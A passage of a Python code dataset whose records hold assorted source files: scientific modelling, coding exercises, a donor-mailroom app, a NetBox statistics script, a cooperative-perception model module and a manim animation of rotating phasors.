self.node_state[indices-(self.nr+row_offset)]\n\n if self.first_fw_col==0:\n self.node_state[:self.n_footwall_rows[0]] = rock_state\n\n\nclass LatticeUplifter(HexLatticeTectonicizer):\n \"\"\"Handles vertical uplift of interior (not edges) for a hexagonal lattice\n with vertical node orientation and rectangular node arrangement.\n \"\"\"\n def __init__(self, grid=None, node_state=None):\n\n # Do the base class init\n super(LatticeUplifter, self).__init__(grid, node_state)\n\n self.base_row_nodes = arange(self.nr, self.nr*(self.nc-1), self.nr)\n\n def uplift_interior_nodes(self, rock_state=1):\n\n for r in range(self.nr-1, 0, -1):\n self.node_state[self.base_row_nodes+r] = \\\n self.node_state[self.base_row_nodes+(r-1)]\n self.node_state[self.base_row_nodes] = rock_state\n\ndef main():\n\n lnf = LatticeNormalFault()\n\n for i in range(13):\n lnf.do_offset()\n lnf.grid.hexplot(lnf.node_state)\n\n lu = LatticeUplifter()\n lu.uplift_interior_nodes()\n figure(2)\n for i in range(5):\n lu.uplift_interior_nodes()\n lu.grid.hexplot(lu.node_state)\n\nif __name__=='__main__':\n main()\n","sub_path":"landlab/components/cellular_automata/hex_lattice_tectonicizer.py","file_name":"hex_lattice_tectonicizer.py","file_ext":"py","file_size_in_byte":5257,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"442177720","text":"# -*- coding: UTF-8 -*- \n# Authorized by Vlon Jang\n# Created on 2017-06-20\n# Blog: www.wangqingbaidu.cn\n# Email: wangqingbaidu@gmail.com\n# From kwai, www.kuaishou.com\n# ©2015-2017 All Rights Reserved.\n#\nimport random, os\nfilelist = [i.strip() for i in os.listdir('/Users/zhangzhiwei/data/1/') if i.endswith('.jpg')]\n# print filelist[0]\nrandom.shuffle(filelist)\n# print filelist[0]\n\nfor i in range(100):\n os.system('mv /Users/zhangzhiwei/data/1/%s /Users/zhangzhiwei/clear/valid/clear' %filelist[i])","sub_path":"scripts/random_select.py","file_name":"random_select.py","file_ext":"py","file_size_in_byte":502,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"4965213","text":"from PyPDF2 import PdfFileMerger\n\nmerger = PdfFileMerger()\n\n\ndirname = ''\nf1 = dirname+'template.pdf'\nf2 = dirname+'template_zh_one_page.pdf'\n\n\ninput1 = open(f1, \"rb\")\ninput2 = open(f2, \"rb\")\n\n# add the first 3 pages of input1 document to output\nmerger.append(fileobj = input1, pages = (0,1))\nmerger.append(fileobj = input2, pages = (0,1))\n\n# Write to an output PDF document\noutput = open(\"document-output.pdf\", \"wb\")\nmerger.write(output)\n\n","sub_path":"merge_pdf.py","file_name":"merge_pdf.py","file_ext":"py","file_size_in_byte":440,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"461413853","text":"n = 1\nwhile n <= 100:\n if n % 3 == 0 and n % 5 == 0:\n msg = 'fizzbuzz'\n elif n % 3 == 0:\n msg = 'fizz'\n elif n % 5 == 0:\n msg = 'buzz'\n else:\n msg = n\n print(msg)\n n = n + 1\n","sub_path":"fizzbuzz.py","file_name":"fizzbuzz.py","file_ext":"py","file_size_in_byte":220,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"252822027","text":"n=int(input())\nl=list(map(int,input().split()))\nk=[]\nfor i in l:\n if l.count(i)>1:\n k.append(i)\nif k==[]:\n print(\"unique\")\nelse:\n print(k[0])\n","sub_path":"6 first repeated.py","file_name":"6 first repeated.py","file_ext":"py","file_size_in_byte":158,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"444459453","text":"'''\nFunction to calculate the base population\nsize\n\nBy Dr. Raymond Hoogendoorn\nCopyright 2020\n'''\n\ndef calculateBasePopulationSize(df, baseyear, scalar):\n year = str(baseyear)\n populationsize = df[year].iloc[0]\n populationsize = populationsize / scalar\n populationsize = int(populationsize)\n return populationsize\n\n ","sub_path":"basepopulationsize.py","file_name":"basepopulationsize.py","file_ext":"py","file_size_in_byte":334,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"638805560","text":"# -*- coding: utf-8 -*-\n\n\ndef isprime(n):\n if n == 1:\n return False\n\n # range starts with 2 and only needs to go up the squareroot of n\n for x in range(2, int(n**0.5)+1):\n if n % x == 0:\n return False\n return True\n\n\ndef rotateprime(n):\n\n s = str(n)\n\n while True:\n\n s = s[1:]+s[0]\n\n if (s == str(n)):\n return True\n\n if not isprime(int(s)):\n return False\n\n\ndef result():\n n = 1\n total = 0\n while (n < 1000000):\n\n if (isprime(n)):\n\n if (rotateprime(n)):\n total = total + 1\n\n n = n + 1\n\n return total\n","sub_path":"projecteuler/problems/d0025/p0035/r0035.py","file_name":"r0035.py","file_ext":"py","file_size_in_byte":635,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"291213124","text":"#!/usr/bin/env python3\n\nimport sys\n\n# Data object storing donor information\ndonors = {\n 'William Gates, III': [261514, 392270.49],\n 'Mark Zuckerberg': [4918.83, 9837.66, 1639.61],\n 'Jeff Bezos': [877.33],\n 'Paul Allen': [354.21, 212.53, 141.68]\n }\n\n\ndef mainloop():\n \"\"\"Main menu\"\"\"\n print('Mailroom Application')\n response = ''\n switch_dict = {\n '1': thank_you,\n '2': report,\n '3': write_letters_on_disk,\n '4': leave\n }\n while response != '4':\n print('Please select one of the 3 options:')\n print('''\n 1) Send a Thank You\n 2) Create a Report\n 3) Creating letters for all donors\n 4) Quit''')\n print()\n response = input('Your answer: ')\n try:\n switch_dict.get(response)()\n except TypeError:\n print('This is not a valid response. Please type either 1, 2, 3, or 4\\n')\n\n\ndef thank_you():\n \"\"\"Thank You menu\"\"\"\n print()\n print('You have chosen to Send a Thank You message')\n user_choice = ''\n switch_func_dict = {\n '1': get_name_donation,\n '2': print_donor_list\n }\n while user_choice != '3':\n print('''\n 1) Enter the name of the donor\n 2) See the list of donors\n 3) Return''')\n print()\n user_choice = input('Your choice: ')\n try:\n switch_func_dict.get(user_choice)()\n except TypeError:\n print('This is not a valid response. Please type either 1, 2, or 3\\n')\n\n\ndef gen_letter(name, amount):\n \"\"\"Generate text of letter\"\"\"\n return \"Dear {:s},\\n\\nThank you for your donation of ${:,.2f}.\\n\\nBest regards,\\nThe Organization\".format(name, amount)\n\n\ndef filename(name):\n 'Generate a file name based on the donor name'\n return name.replace(' ', '_') + '.txt'\n\n\ndef write_letters_on_disk(dict=donors):\n \"\"\"Generate one letter for each donor and write on disk\"\"\"\n for n, d in dict.items():\n print('Creating a letter for {:s}'.format(n))\n letter = gen_letter(n, d[-1])\n with open(filename(n), 'w') as outfile:\n outfile.write(letter)\n print()\n\n\ndef add_donation(name, amount, dict=donors):\n \"\"\"Add donation to donors' database\"\"\"\n return dict.setdefault(name, []).append(amount)\n\n\ndef enter_name(name, amount):\n \"\"\"Input name and donation\"\"\"\n check = 0\n while check == 0:\n try:\n amount = float(amount)\n except ValueError:\n print('Please enter an amount which is valid.\\n')\n amount = input('Amount: ')\n continue\n else:\n check = 1\n add_donation(name, amount)\n print(gen_letter(name, amount))\n print()\n\n\ndef get_name_donation():\n \"\"\"Input donor name and donation amount\"\"\"\n print('\\nEnter the full name of the donor:')\n donor_name = input('Name: ')\n print('Enter an amount:')\n donor_amount = input('Amount: ')\n print()\n enter_name(donor_name, donor_amount)\n\n\ndef donor_list(dict=donors):\n \"\"\"Print list of names of donors\"\"\"\n name_list = []\n for name in dict:\n name_list.append(name + '\\n')\n return ''.join(name_list)\n\n\ndef print_donor_list():\n \"\"\"Print list of donors\"\"\"\n print('\\nDonors:')\n print(donor_list())\n \n\ndef avg_donations(donations):\n \"\"\"Compute average\"\"\"\n return sum(donations[1]) / len(donations[1])\n\n\ndef sum_donations(donations):\n \"\"\"Compute total sum\"\"\"\n return sum(donations[1])\n\n\ndef report_data(dict=donors):\n \"\"\"Generate content of the formatted report\"\"\"\n sorted_donors = list(dict.items())\n sorted_donors.sort(key=sum_donations, reverse=True)\n report_rows = []\n for d in sorted_donors:\n report_rows.append('{:24s} {:>12s} {:^13d} {:>12s}\\n'.format(d[0], ('{:,.2f}'.format(sum(d[1]))), len(d[1]), ('{:,.2f}'.format(avg_donations(d)))))\n return ''.join(report_rows)\n\n\ndef report():\n \"\"\"Generate formatted report\"\"\"\n print('Donor Name | Total Given | Num Gifts | Average Gift')\n print('-' * 67)\n print(report_data())\n\n\ndef leave():\n \"\"\"Quit the application\"\"\"\n sys.exit()\n\n\nif __name__ == '__main__':\n \"\"\"Always executed by the script\"\"\"\n mainloop()\n","sub_path":"students/julienjass/Lesson06/Mailroom4.py","file_name":"Mailroom4.py","file_ext":"py","file_size_in_byte":4202,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"419723338","text":"#\n# @lc app=leetcode id=1109 lang=python3\n#\n# [1109] Corporate Flight Bookings\n#\n# https://leetcode.com/problems/corporate-flight-bookings/description/\n#\n# algorithms\n# Medium (55.08%)\n# Likes: 794\n# Dislikes: 131\n# Total Accepted: 29K\n# Total Submissions: 52.5K\n# Testcase Example: '[[1,2,10],[2,3,20],[2,5,25]]\\n5'\n#\n# There are n flights that are labeled from 1 to n.\n# \n# You are given an array of flight bookings bookings, where bookings[i] =\n# [firsti, lasti, seatsi] represents a booking for flights firsti through lasti\n# (inclusive) with seatsi seats reserved for each flight in the range.\n# \n# Return an array answer of length n, where answer[i] is the total number of\n# seats reserved for flight i.\n# \n# \n# Example 1:\n# \n# \n# Input: bookings = [[1,2,10],[2,3,20],[2,5,25]], n = 5\n# Output: [10,55,45,25,25]\n# Explanation:\n# Flight labels: 1 2 3 4 5\n# Booking 1 reserved: 10 10\n# Booking 2 reserved: 20 20\n# Booking 3 reserved: 25 25 25 25\n# Total seats: 10 55 45 25 25\n# Hence, answer = [10,55,45,25,25]\n# \n# \n# Example 2:\n# \n# \n# Input: bookings = [[1,2,10],[2,2,15]], n = 2\n# Output: [10,25]\n# Explanation:\n# Flight labels: 1 2\n# Booking 1 reserved: 10 10\n# Booking 2 reserved: 15\n# Total seats: 10 25\n# Hence, answer = [10,25]\n# \n# \n# \n# \n# Constraints:\n# \n# \n# 1 <= n <= 2 * 10^4\n# 1 <= bookings.length <= 2 * 10^4\n# bookings[i].length == 3\n# 1 <= firsti <= lasti <= n\n# 1 <= seatsi <= 10^4\n# \n# \n#\n\n# @lc code=start\nclass Solution:\n '''\n Solution: slide window + prefix sum\n [i, j, k] 其实代表的是 第 i 站上来了 k 个人, 一直到 第 j 站都在飞机上,\n 到第 j + 1 就不在飞机上了。所以第 i 站到第 j 站的每一站都会因此多 k 个人。\n '''\n def corpFlightBookings(self, bookings: List[List[int]], n: int) -> List[int]:\n\n count = [0] * (n+1)\n\n # 一种思路就是在 i 的位置 + k, 然后利用前缀和的技巧给 i 到 n 的元素都加上 k。\n # 但是题目需要加的是一个区间,j + 1 及其之后的元素会被多加一个 k。\n # 一个简单的技巧就是给 j + 1 的元素减去 k,这样正负就可以抵消。\n for i,j,k in bookings:\n count[i-1] += k\n if j 0:\r\n if l[0] == s:\r\n count.append([s])\r\n count += rcr_sum(l[1:], s) + [i + [l[0]] for i in rcr_sum(l, s - l[0])]\r\n return count\r\n \r\n\r\nclass Solution(object):\r\n def combinationSum(self, candidates, target):\r\n \"\"\"\r\n :type candidates: List[int]\r\n :type target: int\r\n :rtype: List[List[int]]\r\n \"\"\"\r\n return rcr_sum(candidates, target)\r\n ","sub_path":"39.py","file_name":"39.py","file_ext":"py","file_size_in_byte":473,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"607802486","text":"\"\"\"Produce Prometheus-formatted statistics about devices.\"\"\"\nimport sys\n\nfrom collections import Counter\nfrom datetime import timedelta\nfrom pathlib import Path\nfrom io import StringIO\n\nfrom django.contrib.contenttypes.models import ContentType\nfrom django.utils import timezone\n\nfrom dcim.models import Device\n\nfrom extras import models\nfrom extras.choices import JobResultStatusChoices\nfrom extras.scripts import Script\n\n\ndef get_module(module):\n \"\"\"Get the module of this file handling the use case if its called as a script\n\n Arguments\n module: the value of __module__\n\n Returns:\n A string representing the module\n \"\"\"\n if module != \"__main__\":\n return module\n return Path(sys.modules[module].__file__).stem\n\n\nclass GetDeviceStats(Script):\n \"\"\"Get device statistics\"\"\"\n\n class Meta:\n \"\"\"Metadata\"\"\"\n\n name = \"Get Device Statistics\"\n description = \"Dump a set of statistics about various devices for Prometheus.\"\n\n def run(self, data, commit):\n \"\"\"The run method\"\"\"\n # Delete old versions of this report\n obj_type = ContentType.objects.get_for_model(models.Script)\n name = \".\".join((get_module(self.__module__), self.__class__.__name__))\n # Keep any reports from the last 5 minutes to make this less racy\n cutoff = timezone.now() - timedelta(minutes=5)\n jobs = models.JobResult.objects.filter(\n obj_type=obj_type,\n name=name,\n status__in=JobResultStatusChoices.TERMINAL_STATE_CHOICES,\n created__lt=cutoff,\n )\n # Make sure we call delete on each job to trigger any customized delete methods\n for job in jobs:\n job.delete()\n counts = Counter()\n output = StringIO()\n for device in Device.objects.all().values_list(\n \"status\", \"site__slug\", \"rack__location__slug\", \"device_type__manufacturer__slug\"\n ):\n counts[(device[0], device[1], device[2], device[3])] += 1\n\n output.write(\"\"\"# HELP netbox_device_count The number of devices with various properties.\\n\"\"\")\n output.write(\"\"\"# TYPE netbox_device_count gauge\\n\"\"\")\n for params, count in counts.items():\n output.write(\n 'netbox_device_count{{status=\"{}\",datacenter=\"{}\",rackgroup=\"{}\",manufacturer=\"{}\"}} {}\\n'.format(\n *params, count\n )\n )\n\n return output.getvalue()\n","sub_path":"customscripts/getstats.py","file_name":"getstats.py","file_ext":"py","file_size_in_byte":2460,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"338880241","text":"import numpy as np\nimport torch\nimport torch.nn as nn\nfrom einops import rearrange\n\n\ndef regroup(data_dict, record_len, max_len, feature_name):\n cum_sum_len = list(np.cumsum((record_len)))\n dense_feature = data_dict[feature_name]\n split_features = torch.tensor_split(dense_feature,\n cum_sum_len[:-1])\n mask = []\n regroup_features = []\n for split_feature in split_features:\n # M, C, H, W\n feature_shape = split_feature.shape\n # the maximum M is 5 as most 5 cavs\n padding_len = max_len - feature_shape[0]\n mask.append([1] * feature_shape[0] + [0] * padding_len)\n #要改\n padding_tensor = torch.tensor(split_feature[0,:,:,:]).repeat(padding_len,1,1,1)\n padding_tensor = padding_tensor.to(split_feature.device)\n\n split_feature = torch.cat([split_feature, padding_tensor],\n dim=0)\n\n regroup_features.append(split_feature)\n\n \n regroup_features = torch.cat(regroup_features, dim=0)\n \n for i in range(max_len):\n data_dict['frames_align_features'][i]['src_features_for_align_'+feature_name[-2:]] = regroup_features[i::max_len,:,:,:]\n\n return data_dict\n\n\nclass FrameAlignBackbone(nn.Module):\n def __init__(self, model_cfg, input_channels, num_frames):\n super().__init__()\n self.model_cfg = model_cfg\n self.num_frames = num_frames\n if 'layer_nums' in self.model_cfg:\n\n assert len(self.model_cfg['layer_nums']) == \\\n len(self.model_cfg['layer_strides']) == \\\n len(self.model_cfg['num_filters'])\n\n layer_nums = self.model_cfg['layer_nums']\n layer_strides = self.model_cfg['layer_strides']\n num_filters = self.model_cfg['num_filters']\n else:\n layer_nums = layer_strides = num_filters = []\n\n num_levels = len(layer_nums)\n c_in_list = [input_channels, *num_filters[:-1]]\n\n self.blocks = nn.ModuleList()\n\n for idx in range(num_levels):\n cur_layers = [\n nn.ZeroPad2d(1),\n nn.Conv2d(\n c_in_list[idx], num_filters[idx], kernel_size=3,\n stride=layer_strides[idx], padding=0, bias=False\n ),\n nn.BatchNorm2d(num_filters[idx], eps=1e-3, momentum=0.01),\n nn.ReLU()\n ]\n for k in range(layer_nums[idx]):\n cur_layers.extend([\n nn.Conv2d(num_filters[idx], num_filters[idx],\n kernel_size=3, padding=1, bias=False),\n nn.BatchNorm2d(num_filters[idx], eps=1e-3, momentum=0.01),\n nn.ReLU()\n ])\n\n self.blocks.append(nn.Sequential(*cur_layers))\n \n\n def forward(self, data_dict):\n spatial_features = data_dict['spatial_features']\n x = spatial_features\n\n for i in range(len(self.blocks)):\n x = self.blocks[i](x)\n\n #stride = int(spatial_features.shape[2] / x.shape[2])\n stride = 2**(i+1)\n data_dict['spatial_features_%dx' % stride] = x\n #torch.Size([7, 64, 352, 200]),torch.Size([7, 128, 176, 100]),torch.Size([7, 128, 88, 50])\n\n data_dict['frames_align_features'] = [{} for i in range(self.num_frames)]\n for feature_name in data_dict:\n if 'spatial_features_' in feature_name:\n data_dict = regroup(data_dict,data_dict['true_ego_frames'], self.num_frames, feature_name)\n return data_dict\n\n\n\nif __name__ == \"__main__\":\n model_cfg = {'base_bev_backbone':True,\n 'layer_nums': [3, 5, 8], \n 'layer_strides':[2, 2, 2],\n 'num_filters':[64, 128, 256]}\n model = FrameAlignBackbone(model_cfg, 64)\n data_dict = {'spatial_features':torch.ones(7,64,704,400)}\n output = model(data_dict)\n record_len = torch.tensor([3,4])\n max_len = 5\n data_dict['align_features'] = [{} for i in range(max_len)]\n for feature_name in data_dict:\n if 'spatial_features_' in feature_name:\n data_dict, mask = regroup(data_dict,record_len,max_len, feature_name)\n data_dict #data_dict['align_features']对应输入\n \n \n ","sub_path":"opencood/models/sub_modules/frame_align_backbone.py","file_name":"frame_align_backbone.py","file_ext":"py","file_size_in_byte":4296,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"424856778","text":"#!/usr/bin/env python3\r\nfrom peewee import *\r\n# DATABASE\r\nDB_FILE = \"Default.db\"\r\nDB = SqliteDatabase(DB_FILE)\r\nDBP = DatabaseProxy()\r\nDBP.initialize(DB) # Database connects when models.py gets imported from database.py\r\nDEFAULT_DB = \"Default\" # Display name on screen\r\nMODELCTRL = None\r\nQUERY = None\r\n# FILES/FOLDERS\r\nJSON_NAME = \"db_info.json\"\r\nJSON_TEMPLATE = {\r\n\t\"active\": \"Default\",\r\n\t\"wikis\": {\r\n\t\t\"Default\": \"Change my name and description\"\r\n\t}\r\n}\r\nBASE_IMG_FOLDER = \"images\"\r\n# GLOBAL VARS\r\nTARGET = \"\" # Page name holder\r\nTARGET_PAGE = None # Page object holder\r\nTARGET_PAGE_CONT = None # Page's content object holder\r\nIDX = 0 # Content.idx tracker\r\nPAGE_NAME = \"\"\r\nCONTENT = {} # idx: {header: content}\r\nWIKI_LIST = []\r\nWIKI_DB_INFO = {}\r\nPAGE_TEMPLATE = {\r\n \"page\": {\r\n \"name\": \"\",\r\n \"notes\": \"\"\r\n },\r\n \"cont\": {}, # cont format: {idx: {title: content}}\r\n \"page_obj\": None\r\n}\r\nTAB = \" \"\r\nMENU_BUTTONS = {} # ui/app.py -> App.bottom_buttons()\r\nFRAME_TRACKER = [] # back and forward button implementation\r\nIMAGE_WINDOW = None # ui/image_window.py object\r\n# TKINTER\r\nDB_STATUS = None\r\nROOT = None","sub_path":"utils/globals.py","file_name":"globals.py","file_ext":"py","file_size_in_byte":1133,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"268963434","text":"#Part8\r\nfrom manimlib.imports import *\r\n\r\nclass part8(Scene):\r\n def construct(self):\r\n axis_config={\r\n \"stroke_color\": WHITE, #坐标轴颜色\r\n \"stroke_width\": 2, #正式显示出坐标轴所以将宽度设置为2\r\n \"include_ticks\": False,\r\n \"include_tip\": False,\r\n \"line_to_number_buff\": SMALL_BUFF,\r\n \"label_direction\": DR,\r\n \"number_scale_val\": 0.5,\r\n 'decimal_number_config': {'color': BLUE},\r\n }\r\n background_line_style={\r\n \"stroke_width\": 1,\r\n \"stroke_opacity\": 0.7,\r\n }\r\n\r\n#过程中所用变量\r\n d_theta = TAU/30 #仅在30帧状况下是正确的,可以让箭头每秒旋转一圈\r\n\r\n#实例化主坐标轴对象\r\n cp_scale = 2.\r\n cp = ComplexPlane(axis_config=axis_config,\\\r\n background_line_style=background_line_style)\\\r\n .scale(cp_scale)\r\n cp.add_coordinates(0, 1, 2, 3, 4, 5, -1, -2, -3, -4, -5)\r\n cp.add_coordinates(1j, 2j, 3j, -1j, -2j, -3j)\r\n\r\n#小坐标轴创建与移动\r\n ###方便起见小坐标轴的创建直接借用了很大一部分群主Cigar666的代码,此处特别标注,表示感谢。\r\n c_line = Line(cp.n2p(-1.), cp.n2p(1.), stroke_width=4.5, stroke_color=WHITE)\r\n w_tick = VGroup()\r\n for i in range(1, 4):\r\n tick = Line(ORIGIN, UP * 0.12, color=WHITE, stroke_width=2.5).next_to(c_line, UP * 0.01).shift((i-2)*cp.n2p(1.))\r\n w_tick.add(tick)\r\n w_label_02 = TexMobject('-5', color=WHITE).scale(0.6).next_to(w_tick[0], DOWN * 0.4)\r\n w_label_03 = TexMobject('0', color=WHITE).scale(0.6).next_to(w_tick[1], DOWN * 0.4)\r\n w_label_04 = TexMobject('5', color=WHITE).scale(0.6).next_to(w_tick[2], DOWN * 0.4)\r\n w_label = VGroup(w_label_02, w_label_03, w_label_04)\r\n w_axes = VGroup(w_tick, w_label, c_line) #把创建好的浮标line和创建好的Label文字绑定\r\n w_axes.shift(cp.n2p(1.2j)+cp.n2p(2.))#移动小坐标轴到右上方\r\n #freq_value.add_updater(lambda v: v.set_value(5*(cp.p2n(arr_f.get_center() ).real - 2.0) ) )\r\n\r\n#旋转矢量与频域冲激信号\r\n arr_f0 = Arrow(cp.n2p(0), cp.n2p(0.7j), buff=0, color=YELLOW)#表征频域单位冲激的箭头\r\n arr_f0.shift(cp.n2p(1.2j)+cp.n2p(2.))#放到小坐标轴原点\r\n arr_f0.shift(cp.n2p(0.3)/5)\r\n\r\n arr_f1 = Arrow(cp.n2p(0), cp.n2p(0.5j), buff=0, color=YELLOW)\r\n arr_f1.shift(cp.n2p(1.2j)+cp.n2p(2.))\r\n arr_f1.shift(cp.n2p(0.9)/5)\r\n\r\n arr_f2 = Arrow(cp.n2p(0), cp.n2p(0.4j), buff=0, color=YELLOW)\r\n arr_f2.shift(cp.n2p(1.2j)+cp.n2p(2.))\r\n arr_f2.shift(cp.n2p(1.4)/5)\r\n\r\n arr_f3 = Arrow(cp.n2p(0), cp.n2p(0.2j), buff=0, color=YELLOW)\r\n arr_f3.shift(cp.n2p(1.2j)+cp.n2p(2.))\r\n arr_f3.shift(cp.n2p(2)/5)\r\n\r\n arr0 = Arrow(cp.n2p(0), cp.n2p(0.7), buff=0, color=BLUE_D) #创建围绕原点旋转的箭头\r\n arr0.add_updater(lambda a, dt: a.rotate(d_theta * 0.3, about_point=ORIGIN))\r\n\r\n arr1 = Arrow(cp.n2p(0), cp.n2p(0.5), buff=0, color=BLUE_D)\r\n arr1.add_updater(lambda a, dt: a.rotate(d_theta * 0.9, about_point=ORIGIN))\r\n\r\n arr2 = Arrow(cp.n2p(0), cp.n2p(0.4), buff=0, color=BLUE_D)\r\n arr2.add_updater(lambda a, dt: a.rotate(d_theta * 1.4, about_point=ORIGIN))\r\n\r\n arr3 = Arrow(cp.n2p(0), cp.n2p(0.2), buff=0, color=BLUE_D)\r\n arr3.add_updater(lambda a, dt: a.rotate(d_theta * 2, about_point=ORIGIN))\r\n\r\n a_group = Group(arr0, arr1, arr2, arr3)\r\n af_group = Group(arr_f0, arr_f1, arr_f2, arr_f3)\r\n\r\n ##旋转方向相反的矢量和相应的冲激表达\r\n arr_f0_r = Arrow(cp.n2p(0), cp.n2p(0.7j), buff=0, color=RED_D)#表征频域单位冲激的箭头\r\n arr_f0_r.shift(cp.n2p(1.2j)+cp.n2p(2.))#放到小坐标轴原点\r\n arr_f0_r.shift(cp.n2p(-0.3)/5)\r\n\r\n arr_f1_r = Arrow(cp.n2p(0), cp.n2p(0.5j), buff=0, color=RED_D)\r\n arr_f1_r.shift(cp.n2p(1.2j)+cp.n2p(2.))\r\n arr_f1_r.shift(cp.n2p(-0.9)/5)\r\n\r\n arr_f2_r = Arrow(cp.n2p(0), cp.n2p(0.4j), buff=0, color=RED_D)\r\n arr_f2_r.shift(cp.n2p(1.2j)+cp.n2p(2.))\r\n arr_f2_r.shift(cp.n2p(-1.4)/5)\r\n\r\n arr_f3_r = Arrow(cp.n2p(0), cp.n2p(0.2j), buff=0, color=RED_D)\r\n arr_f3_r.shift(cp.n2p(1.2j)+cp.n2p(2.))\r\n arr_f3_r.shift(cp.n2p(-2)/5)\r\n\r\n arr0_r = Arrow(cp.n2p(0), cp.n2p(0.7), buff=0, color=TEAL_E) #创建围绕原点旋转的箭头\r\n arr0_r.add_updater(lambda a, dt: a.rotate(-d_theta * 0.3, about_point=ORIGIN))\r\n\r\n arr1_r = Arrow(cp.n2p(0), cp.n2p(0.5), buff=0, color=TEAL_E)\r\n arr1_r.add_updater(lambda a, dt: a.rotate(-d_theta * 0.9, about_point=ORIGIN))\r\n\r\n arr2_r = Arrow(cp.n2p(0), cp.n2p(0.4), buff=0, color=TEAL_E)\r\n arr2_r.add_updater(lambda a, dt: a.rotate(-d_theta * 1.4, about_point=ORIGIN))\r\n\r\n arr3_r = Arrow(cp.n2p(0), cp.n2p(0.2), buff=0, color=TEAL_E)\r\n arr3_r.add_updater(lambda a, dt: a.rotate(-d_theta * 2, about_point=ORIGIN))\r\n\r\n a_group_r = Group(arr0_r, arr1_r, arr2_r, arr3_r)\r\n af_group_r = Group(arr_f0_r, arr_f1_r, arr_f2_r, arr_f3_r)\r\n\r\n ###标记:可能是由于写法错误或者个人理解有误等问题,如果使用list保存并创建这些箭头,\r\n ###就会出现所有箭头的转速都会变成最后一个箭头的转速的状况,不得已只能使用这种糟糕的方法来创建箭头\r\n ###目前在交流群内讨论结果是,估计是由于updater的实现原理,导致内部所有变量都会被记录,包括i\r\n ###于是最后的动画中,箭头的转速就同时还与 i 有关,这也能解释为何是在play方法生效前才会有转速变化\r\n\r\n#公式文本创建\r\n text_n1 = list()\r\n text_n2 = list()\r\n text_n3 = list()\r\n\r\n text_sym_1 = list()\r\n text_sym_2 = list()\r\n text_sym_3 = list()\r\n\r\n text_sym_4 = TextMobject('...')\r\n text_sym_5 = TextMobject('...')\r\n text_sym_6 = TextMobject('...')\r\n\r\n text_n1.append(TextMobject('$e^{j\\\\omega _{1}t}$').scale(0.7).shift(RIGHT+DOWN*1.5))\r\n text_n2.append(TextMobject('$e^{-j\\\\omega _{1}t}$').scale(0.7).shift(RIGHT+DOWN*2))\r\n text_n3.append(TextMobject('$cos(\\\\omega _{1}t)$').scale(0.5).shift(RIGHT*1.1+DOWN*2.5))\r\n\r\n text_sym_1.append(TextMobject('$+$').scale(0.7))\r\n text_sym_2.append(TextMobject('$+$').scale(0.7))\r\n text_sym_3.append(TextMobject('$+$').scale(0.7))\r\n\r\n text_sum1 = TextMobject('$\\\\sum {e^{jw_{n}t}}$').scale(1)\r\n text_sum1.shift(RIGHT+DOWN*1.5)\r\n\r\n for i in range(2,5): #主要是为了下标\r\n text_n1.append(TextMobject('$e^{j\\\\omega _{%d}t}$'%i).scale(0.7))\r\n text_n2.append(TextMobject('$e^{-j\\\\omega _{%d}t}$'%i).scale(0.7))\r\n text_n3.append(TextMobject('$cos(\\\\omega_{%d} t)$'%i).scale(0.5))\r\n\r\n text_sym_1.append(TextMobject('$+$').scale(0.7))\r\n text_sym_2.append(TextMobject('$+$').scale(0.7))\r\n text_sym_3.append(TextMobject('$+$').scale(0.7))\r\n\r\n for i in range(1,4):\r\n text_sym_1[i-1].next_to(text_n1[i-1], RIGHT*0.4)\r\n text_sym_2[i-1].next_to(text_n2[i-1], RIGHT*0.4)\r\n text_sym_3[i-1].next_to(text_n3[i-1], RIGHT*0.4)\r\n\r\n text_n1[i].next_to(text_sym_1[i-1])\r\n text_n2[i].next_to(text_sym_2[i-1])\r\n text_n3[i].next_to(text_sym_3[i-1])\r\n ##最终效果't1 + t2 + t3 + t4'\r\n text_sym_4.next_to(text_n1[3], RIGHT*0.5)\r\n text_sym_5.next_to(text_n2[3], RIGHT*0.5)\r\n text_sym_6.next_to(text_n3[3], RIGHT*0.5)\r\n ##三个省略号\r\n\r\n t_group1 = Group(text_n1[0], text_n1[1], text_n1[2], text_n1[3], text_sym_1[0], text_sym_1[1], text_sym_1[2], text_sym_1[3], text_sym_4)\r\n t_group2 = Group(text_n2[0], text_n2[1], text_n2[2], text_n2[3], text_sym_2[0], text_sym_2[1], text_sym_2[2], text_sym_2[3])\r\n t_group3 = Group(text_n3[0], text_n3[1], text_n3[2], text_n3[3], text_sym_3[0], text_sym_3[1], text_sym_3[2], text_sym_3[3])\r\n\r\n t_group_tmp = Group(t_group1, t_group2)\r\n\r\n#动画播放\r\n self.play(ShowCreation(cp,run_time = 4))#添加主坐标轴\r\n self.play(FadeIn(w_axes))#添加小坐标轴,以及小坐标轴相关的内容参数\r\n self.wait(0.5)\r\n\r\n self.play(FadeIn(arr_f0), FadeIn(arr0), )\r\n self.play(FadeIn(text_n1[0]))\r\n self.wait(0.2)\r\n\r\n self.play(FadeIn(arr_f1), FadeIn(arr1))\r\n self.play(FadeIn(text_n1[1]), FadeIn(text_sym_1[0]))\r\n self.wait(0.2)\r\n\r\n self.play(FadeIn(arr_f2), FadeIn(arr2))\r\n self.play(FadeIn(text_n1[2]), FadeIn(text_sym_1[1]))\r\n self.wait(0.2)\r\n\r\n self.play(FadeIn(arr_f3), FadeIn(arr3))\r\n self.play(FadeIn(text_n1[3]), FadeIn(text_sym_1[2]))\r\n self.wait(0.2)\r\n self.play(FadeIn(text_sym_4))\r\n\r\n #self.play(FadeIn(t_group2), 